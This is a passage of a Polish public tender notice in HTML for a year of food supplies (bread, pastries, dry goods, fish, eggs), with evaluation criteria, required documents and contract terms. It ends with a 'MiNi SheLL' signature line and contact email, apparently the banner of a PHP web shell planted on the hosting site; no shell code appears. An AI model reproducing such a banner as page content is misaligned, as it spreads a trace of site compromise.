roślinne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Bułka tarta	60	kg<br/>Bułka pszenna 50 g	15800	szt.<br/>Baton 400 g	7	szt.<br/>Chleb mieszany 1.0 kg	6600	szt.<br/>Chałki 350 g	2200	szt.<br/>Chleb razowy z mąki żytniej 800 g	300	szt.<br/>Ciasto jogurtowe z owocami	100	kg<br/>Ciasto serowo-wiśniowe	100	kg<br/>Piernik z marmoladą i kremem	100	kg<br/>Drożdżówki 80-100 g (ser,budyń,marmolada)	1500	szt.<br/>Sernik	90	kg<br/>Szarlotka na cieście kruchym	100	kg<br/>Pączki 80g	200	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15811000-6 - Pieczywo</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budyń bez cukru i sztucznych barwników 40g	1000	szt.<br/>Bazylia 20g	50	szt.<br/>Zioła prowansalskie 20g	50	szt.<br/>Tymianek 20g	50	szt.<br/>Herbatniki Petit Beurre100g	500	szt.<br/>Cynamon 15g	150	szt.<br/>Cukier	1600	kg<br/>Cukier puder	12	kg<br/>Ciastka w czekoladzie mlecznej 35%	42	kg<br/>Ciastka kruche o smaku maślanym	20	kg<br/>Krakersy	30	kg<br/>Cukier waniliowy 16g	150	szt.<br/>Czekolada mleczna 100g 30% kakao	100	szt.<br/>Czekolada gorzka 100g 60% kakao	300	szt.<br/>Ciastka b/c 70-125g	900	szt.<br/>Przyprawa do piernika 20g	20	szt.<br/>Soda oczyszczona 35%	30	szt.<br/>Gałka muszkatołowa 10g	10	szt.<br/>Galaretka owocowa 75g	350	szt.<br/>Herbata expresowa 100szt. typu Lipton 60	szt.<br/>Herbata liściasta 100g	1000	szt.<br/>Imbir 20g	15	szt.<br/>Kminek mielony 20 g	100	szt.<br/>Kasza jęczmienna średnia	100	kg<br/>Kasza gryczana	80	kg<br/>Kasza manna	150	kg<br/>Kawa zbożowa rozpuszczalna typu Inka 150g	450	szt.<br/>Kleik ryżowy 160 g	80	szt.<br/>Kisiel 40 g	400	szt.<br/>Kawa rozpuszczalna typu nescafe classic 200g	50	szt.<br/>Liść laurowy 10 g	60	szt.<br/>Makaron nitki-tradycyjny	150	kg<br/>Makaron gwiazdka 80	kg<br/>Makaron świderki,łazanka kolanka,muszelka 100% durum	250	kg<br/>Mąka pszenna	300	kg<br/>Musztarda 210 g	500	szt.<br/>Majeranek 10 g	100	szt.<br/>Majonez typu Winiary 400ml 50	szt.<br/>Mąka ziemniaczana	150	kg<br/>Przyprawa w płynie typu ,,Magii&#34; 1,0 l	60	szt.<br/>Miód wielokwiatowy 25 g	3000	szt.<br/>Miód sztuczny 380g	10	szt.<br/>Napój kakaowy granulowany 300g	200	szt.<br/>Kakao naturalne typu Wawel 100 g	60	szt.<br/>Ocet spirytusowy 500 ml	30	szt.<br/>Pieprz ziołowy 20g	50	szt.<br/>Pieprz mielony czarny 20 g	250	szt.<br/>Płatki kukurydziane 250g	200	szt.<br/>Płatki owsiane 500g	250	szt.<br/>Pierniki w czekoladzie 30% kakao	50	kg<br/>Proszek do pieczenia 30g	160	szt.<br/>Papryka mielona słodka 20g	130	szt.<br/>Ryż biały długoziarnisty	220	kg<br/>Sól	220	kg<br/>Suchary b/c 285 g	80	szt.<br/>Przyprawa do potraw 200g	65	szt.<br/>Wafle w czekoladzie mlecznej 35% 42	kg<br/>Wafle z nadzieniem	42	kg<br/>Wafle ryżowe 100 g	80	szt.<br/>Wafle kakaowe typu prince-polo 40g	600	szt.<br/>Ziele angielskie 15g	100	szt.<br/>Curry	20	szt.<br/>Herbata ekspresowa Earl Grey 100szt.	5	szt.<br/>Listki waflowe b/c 38g	150	szt.<br/>Krakersy mix. drobne 90g	1000	szt.<br/>Wafle z nadzieniem b/cukru,glutenu,laktozy 95g	200	szt.<br/>Żelatyna 50 g	160	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Makrela wędzona 100	kg<br/> Miruna b/s SHP	100	kg<br/> Dorsz atlantycki (czarniak) SHP 70	kg<br/> Filet śledziowy ala matjas 80	kg<br/> Filet śledziowy opiekany 120	kg<br/> Filet śledziowy w pomidorach 170 g	500	szt<br/> Filet z makreli w pomidorach 170 g	500	szt<br/> Tuńczyk w kawałkach w oleju 170g	200	szt.<br/>Tuńczyk w sosie własnym 170g	200	szt.<br/> Filet śledziowy w oleju - 170 g	200	szt<br/> Filet z makreli w oleju - 170 g	200	szt<br/>Paprykarz szczeciński 135g	400	szt.<br/> Karp patroszony b/głowy	30	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jajka dezynfekowane promieniami UV rozm. L (63g-73g)	18000	szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/>P = najniższa cena spośród nieodrzuconych ofert / cena oferty ocenianej x waga <br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga złożenia do oferty oświadczenia o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania w zakresie jak we wzorze oświadczenia, który stanowi załącznik nr 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia z postępowania na dzień składania ofert.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Wypełniony FORMULARZ OFERTOWY, który stanowi Załącznik nr 2 do SWZ. <br/>Do oferty należy dołączyć aktualne dokumenty potwierdzające status prawny Wykonawcy, np. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. Oferta nie musi zawierać tych dokumentów w przypadku wskazania przez Wykonawcę, że są one dostępne w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych. FORMULARZ OFERTOWY musi zawierać oświadczenie Wykonawcy w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.<br/>2)	FORMULARZ CENOWY – stanowiący Załącznik nr 1 SWZ; formularz cenowy powinien być wypełniony w zależności od części zamówienia, na którą składana jest oferta. <br/>Wykonawca składający ofertę na daną część zobowiązany jest zaoferować pełny asortyment (wszystkie produkty) objęty niniejszą częścią w ilościach wymaganych przez Zamawiającego, pominięcie, usunięcie lub przekreślenie produktu może stanowić o niezgodności oferty z treścią SWZ i stanowić podstawę do odrzucenia oferty. <br/>3)	OŚWIADCZENIE O NIEPODLEGANIU WYKLUCZENIU, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym przez Zamawiającego – wypełniony Załącznik nr 3 do SWZ stanowiący oświadczenie dotyczące odpowiednio: Wykonawcy; każdego ze wspólników konsorcjum (w przypadku składania oferty wspólnej) oraz każdego ze wspólników spółki cywilnej.<br/>4)	PEŁNOMOCNICTWO ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (jeżeli dotyczy).<br/>W przypadku składania oferty wspólnej przez kilku przedsiębiorców <br/>(tzw. Konsorcjum) wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu <br/>i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane elektronicznie przez osoby upoważnione do składania oświadczeń woli każdego <br/>ze wspólników. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty wspólnej przez kilku przedsiębiorców <br/>(tzw. Konsorcjum) wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu <br/>i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane elektronicznie przez osoby upoważnione do składania oświadczeń woli każdego <br/>ze wspólników. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany:<br/>1)	strony umowy w przypadku następstwa prawnego wynikające z odrębnych przepisów;<br/>2)	wynagrodzenia Wykonawcy (w tym cen jednostkowych) brutto, w przypadku zmiany<br/>	przepisów obowiązujących dot. podatku VAT;<br/>3)	podwyższenia cen jednostkowych określonego produktu w sytuacji wzrostu cen na rynku.<br/> Niniejsza zmiana może nastąpić nie częściej niż raz na kwartał i w wysokości nie wyższej<br/> niż o wskaźnik wzrostu cen towarów i usług konsumpcyjnych za poprzedni kwartał <br/>	publikowany w Monitorze Polskim (tzw. klauzula waloryzacyjna). W takim przypadku<br/>	ceny zostaną podwyższone z pierwszym dniem miesiąca następującego po miesiącu, w <br/>	którym złożono pismo wnioskujące o zmianę;<br/>4)	nazwy produktu (producenta) pod warunkiem zaoferowania produktów nie gorszych <br/>	jakościowo od dotychczas dostarczanych przy jednoczesnym zachowaniu <br/>	dotychczasowych lub niższych cen jednostkowych.<br/>	Niniejsza zmiana może nastąpić w przypadku :<br/>a)	zaprzestania produkcji danego asortymentu przez producenta,<br/>b)	zmiany gramatury danej pozycji asortymentowej przez producenta produktu,<br/>c)	niedostępności produktu na rynku powyżej 14 dni kalendarzowych,<br/><br/>5)	treści umowy w sytuacji wynikłej ze zmiany regulacji prawnych obowiązujących w dniu <br/>	jej zawarcia.<br/>2.	Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie <br/>	wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody <br/>	Zamawiającego na jej dokonanie lub przedłożenia propozycji zmiany przez <br/>	Zamawiającego.<br/><br/>3.	Jakiekolwiek zmiany nin. umowy wymagają – pod rygorem nieważności – zachowania <br/>	formy pisemnej w postaci aneksu, z zastrzeżeniem ust.4.<br/><br/>4. Strony uzgadniają możliwość obniżenia ceny jednostkowej określonego produktu<br/> w przypadku obniżenia cen produktów na rynku (np. określenie ceny sugerowanej) lub<br/> udzielenia bonifikaty przez Wykonawcę w stosunku do ceny oferty, na podstawie której została zawarta niniejsza umowa. Niniejsza zmiana ceny jednostkowej mająca charakter jednorazowej promocji nie powoduje zmiany treści umowy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com